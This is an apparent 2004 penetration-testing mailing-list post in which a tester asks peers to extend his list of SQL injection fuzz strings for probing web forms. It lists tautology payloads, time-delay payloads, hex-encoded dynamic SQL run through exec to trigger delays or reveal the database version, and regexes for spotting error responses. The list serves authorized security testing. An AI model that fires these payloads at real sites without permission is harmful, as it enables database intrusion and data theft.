SQL Injection Strings

From: Jeremy Junginger (jj_at_act.com)
Date: 06/25/04

    To: <pen-test@securityfocus.com>
    Date: Fri, 25 Jun 2004 08:01:39 -0700


    Good Morning,

    I'm customizing an http proxy that's feeding some POST parameters into web
    forms to test for SQL injections. I figured this would be the group to help
    put together a comprehensive list of "fuzz strings" to feed into the forms to
    test them. Here's what I have so far. I know it's far from complete.
    Please add any additional strings that you think may be helpful, or perhaps a
    link to an archived thread that has already discussed this?!?:

    'sqlvuln
    '+sqlvuln
    sqlvuln;
    (sqlvuln)
    a' or 1=1--
    a" or 1=1--
    a" or "a" = "a
    a' or 'a' = 'a
    1 or 1=1
    a' waitfor delay '0:0:10'--
    1 waitfor delay '0:0:10'--
    declare @q nvarchar (4000) select @q =
    0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
    declare @s varchar(22) select @s =
    0x77616974666F722064656C61792027303A303A31302700 exec(@s)
    declare @q nvarchar (4000) select @q =
    0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
    declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
    exec(@s)

    And if you're feeling even more generous, perhaps you have some suggestions
    on checking the response. I'm doing a regex search for the following to
    determine interesting strings. Of course I still have to take a look at some
    of the 200 responses to see if the waitfor and version commands worked :)

    HTTP/[0-9]\.[0-9] 500
    [Ee]rror
    (My)?SQL

    Thanks guys!

    -Jeremy
